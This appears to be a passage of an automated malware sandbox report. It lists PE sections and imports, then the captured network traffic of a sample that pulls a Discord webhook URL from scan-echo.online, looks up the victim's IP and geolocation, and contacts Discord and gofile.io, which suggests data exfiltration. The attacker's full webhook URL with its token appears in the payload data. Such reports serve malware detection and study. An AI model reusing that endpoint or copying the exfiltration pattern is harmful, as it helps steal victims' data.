                                                                                                                                                                                                                            .data0x3b0000x103d80xe00False0.13141741071428573data1.8097417190078857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .pdata0x4c0000x20640x2200False0.470703125data5.27617271518525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            _RDATA0x4f0000xf40x200False0.30859375data1.9890060993636334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0x500000x2c880x2e00False0.10411005434782608data4.155747259572133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x530000x7540x800False0.55908203125data5.254932107703867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                            RT_ICON0x500e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3778 x 3778 px/m
                                                                                                                                                                                                                            RT_GROUP_ICON0x526900x14data
                                                                                                                                                                                                                            RT_MANIFEST0x526a40x5e4XML 1.0 document, ASCII text, with CRLF line terminators

                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                            KERNEL32.dllGetOEMCP, GetACP, IsValidCodePage, GetFileAttributesExW, FlushFileBuffers, GetCurrentDirectoryW, GetCPInfo, GetEnvironmentStringsW, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, FreeEnvironmentStringsW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, GetCommandLineW, SetLastError, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, ReadFile, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, SetStdHandle, SetConsoleCtrlHandler, DeleteFileW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.889307022 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.889359951 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.889447927 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.891189098 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.891211033 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.963092089 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.965115070 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.965136051 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.966931105 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.967008114 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.969290018 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.969409943 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.969645023 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.969652891 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.015784025 CEST4434969851.91.236.255192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.016072989 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.017395973 CEST49698443192.168.2.351.91.236.255
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.175282955 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.175338030 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.175426006 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.176424026 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.176445961 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.836447954 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.837177038 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.837246895 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.838814020 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.838898897 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.840231895 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.840358019 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.840430021 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.883553982 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.883609056 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:35.930461884 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.163464069 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.163678885 CEST44349699173.231.16.76192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.163810968 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.164232969 CEST49699443192.168.2.3173.231.16.76
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.309462070 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.309520960 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.309721947 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.311530113 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.311574936 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.427303076 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.429147005 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.429200888 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.430681944 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.430845022 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.431922913 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.432091951 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.432102919 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.476286888 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.477508068 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.477552891 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.491900921 CEST44349700159.89.102.253192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.493088961 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.494352102 CEST49700443192.168.2.3159.89.102.253
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.634619951 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.634708881 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.634814978 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.636217117 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.636259079 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.689814091 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.690397978 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.690460920 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.691724062 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.691845894 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.693294048 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.693418026 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.693502903 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.693644047 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.693671942 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.743105888 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.023668051 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.023984909 CEST44349701162.159.128.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.024718046 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.026084900 CEST49701443192.168.2.3162.159.128.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.272452116 CEST49702443192.168.2.351.178.66.33
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.272528887 CEST4434970251.178.66.33192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.272670031 CEST49702443192.168.2.351.178.66.33
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.310767889 CEST49702443192.168.2.351.178.66.33
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.310817003 CEST4434970251.178.66.33192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.396903992 CEST4434970251.178.66.33192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.397624016 CEST49702443192.168.2.351.178.66.33
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.397675037 CEST4434970251.178.66.33192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.399012089 CEST4434970251.178.66.33192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.399138927 CEST49702443192.168.2.351.178.66.33
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.400309086 CEST49702443192.168.2.351.178.66.33
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.400583029 CEST49702443192.168.2.351.178.66.33
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.759809017 CEST49703443192.168.2.351.38.43.18
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.759861946 CEST4434970351.38.43.18192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.759991884 CEST49703443192.168.2.351.38.43.18
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.786355019 CEST49703443192.168.2.351.38.43.18
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.786405087 CEST4434970351.38.43.18192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.901566982 CEST4434970351.38.43.18192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.902158976 CEST49703443192.168.2.351.38.43.18
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.902199984 CEST4434970351.38.43.18192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.904247999 CEST4434970351.38.43.18192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.904328108 CEST49703443192.168.2.351.38.43.18
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.905344963 CEST49703443192.168.2.351.38.43.18
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.905548096 CEST49703443192.168.2.351.38.43.18
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.099318981 CEST49704443192.168.2.3162.159.133.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.099386930 CEST44349704162.159.133.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.099524021 CEST49704443192.168.2.3162.159.133.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.121408939 CEST49704443192.168.2.3162.159.133.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.121455908 CEST44349704162.159.133.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.176234961 CEST44349704162.159.133.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.176793098 CEST49704443192.168.2.3162.159.133.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.176856995 CEST44349704162.159.133.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.179018974 CEST44349704162.159.133.233192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.179229975 CEST49704443192.168.2.3162.159.133.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.180001020 CEST49704443192.168.2.3162.159.133.233
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.180177927 CEST49704443192.168.2.3162.159.133.233

                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.812150955 CEST5238753192.168.2.38.8.8.8
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.884054899 CEST53523878.8.8.8192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.152988911 CEST5692453192.168.2.38.8.8.8
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.173748016 CEST53569248.8.8.8192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.279817104 CEST6062553192.168.2.38.8.8.8
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.308448076 CEST53606258.8.8.8192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.607594013 CEST4930253192.168.2.38.8.8.8
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.633316040 CEST53493028.8.8.8192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.222579002 CEST5397553192.168.2.38.8.8.8
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.267797947 CEST53539758.8.8.8192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.737293959 CEST5113953192.168.2.38.8.8.8
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.758065939 CEST53511398.8.8.8192.168.2.3
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.071316957 CEST5295553192.168.2.38.8.8.8
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.097721100 CEST53529558.8.8.8192.168.2.3

                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.812150955 CEST192.168.2.38.8.8.80xaf69Standard query (0)scan-echo.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.152988911 CEST192.168.2.38.8.8.80x6152Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.279817104 CEST192.168.2.38.8.8.80xb5c0Standard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.607594013 CEST192.168.2.38.8.8.80x5ec3Standard query (0)ptb.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.222579002 CEST192.168.2.38.8.8.80x4257Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.737293959 CEST192.168.2.38.8.8.80xb288Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.071316957 CEST192.168.2.38.8.8.80xf277Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Jun 3, 2023 12:17:31.884054899 CEST8.8.8.8192.168.2.30xaf69No error (0)scan-echo.online51.91.236.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.173748016 CEST8.8.8.8192.168.2.30x6152No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.173748016 CEST8.8.8.8192.168.2.30x6152No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.173748016 CEST8.8.8.8192.168.2.30x6152No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:32.173748016 CEST8.8.8.8192.168.2.30x6152No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.308448076 CEST8.8.8.8192.168.2.30xb5c0No error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.633316040 CEST8.8.8.8192.168.2.30x5ec3No error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.633316040 CEST8.8.8.8192.168.2.30x5ec3No error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.633316040 CEST8.8.8.8192.168.2.30x5ec3No error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.633316040 CEST8.8.8.8192.168.2.30x5ec3No error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:36.633316040 CEST8.8.8.8192.168.2.30x5ec3No error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.267797947 CEST8.8.8.8192.168.2.30x4257No error (0)api.gofile.io51.178.66.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.267797947 CEST8.8.8.8192.168.2.30x4257No error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.267797947 CEST8.8.8.8192.168.2.30x4257No error (0)api.gofile.io151.80.29.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.758065939 CEST8.8.8.8192.168.2.30xb288No error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.758065939 CEST8.8.8.8192.168.2.30xb288No error (0)api.gofile.io151.80.29.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:37.758065939 CEST8.8.8.8192.168.2.30xb288No error (0)api.gofile.io51.178.66.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.097721100 CEST8.8.8.8192.168.2.30xf277No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.097721100 CEST8.8.8.8192.168.2.30xf277No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.097721100 CEST8.8.8.8192.168.2.30xf277No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.097721100 CEST8.8.8.8192.168.2.30xf277No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jun 3, 2023 12:17:38.097721100 CEST8.8.8.8192.168.2.30xf277No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false

                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                            • scan-echo.online
                                                                                                                                                                                                                            • api.ipify.org
                                                                                                                                                                                                                            • geolocation-db.com
                                                                                                                                                                                                                            • ptb.discord.com

                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            0192.168.2.34969851.91.236.255443C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2023-06-03 10:17:31 UTC0OUTGET /gra/ HTTP/1.1
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            Host: scan-echo.online
                                                                                                                                                                                                                            User-Agent: Python-urllib/3.9
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2023-06-03 10:17:32 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sat, 03 Jun 2023 10:17:31 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 393
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            2023-06-03 10:17:32 UTC0INData Raw: 22 68 74 74 70 73 3a 2f 2f 70 74 62 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 61 70 69 2f 77 65 62 68 6f 6f 6b 73 2f 31 30 39 35 30 37 34 34 33 31 32 32 34 37 39 31 30 34 31 2f 6a 51 61 5a 34 68 4b 47 6a 62 6e 4b 55 7a 79 49 4f 54 69 71 72 5f 62 6a 39 52 34 47 4f 71 71 6e 47 75 73 4f 49 57 45 74 39 4d 64 36 70 75 42 69 49 66 78 41 48 67 64 73 71 32 61 41 55 5f 42 59 6c 58 6a 57 22 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 52 45 43 2d 68 74 6d 6c 34 30 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                            Data Ascii: "https://ptb.discord.com/api/webhooks/1095074431224791041/jQaZ4hKGjbnKUzyIOTiqr_bj9R4GOqqnGusOIWEt9Md6puBiIfxAHgdsq2aAU_BYlXjW"<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"><html><head><title>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            1192.168.2.349699173.231.16.76443C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2023-06-03 10:17:35 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                                                                                            User-Agent: Python-urllib/3.9
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2023-06-03 10:17:36 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Content-Length: 14
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Date: Sat, 03 Jun 2023 10:17:36 GMT
                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2023-06-03 10:17:36 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 33
                                                                                                                                                                                                                            Data Ascii: 102.129.143.43


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            2192.168.2.349700159.89.102.253443C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2023-06-03 10:17:36 UTC0OUTGET /jsonp/102.129.143.43 HTTP/1.1
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            Host: geolocation-db.com
                                                                                                                                                                                                                            User-Agent: Python-urllib/3.9
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2023-06-03 10:17:36 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Sat, 03 Jun 2023 10:17:36 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            2023-06-03 10:17:36 UTC1INData Raw: 62 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 22 70 6f 73 74 61 6c 22 3a 22 39 30 30 30 39 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 34 2e 30 35 34 34 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 31 31 38 2e 32 34 34 2c 22 49 50 76 34 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 33 22 2c 22 73 74 61 74 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: b9callback({"country_code":"US","country_name":"United States","city":"Los Angeles","postal":"90009","latitude":34.0544,"longitude":-118.244,"IPv4":"102.129.143.43","state":"California"})0


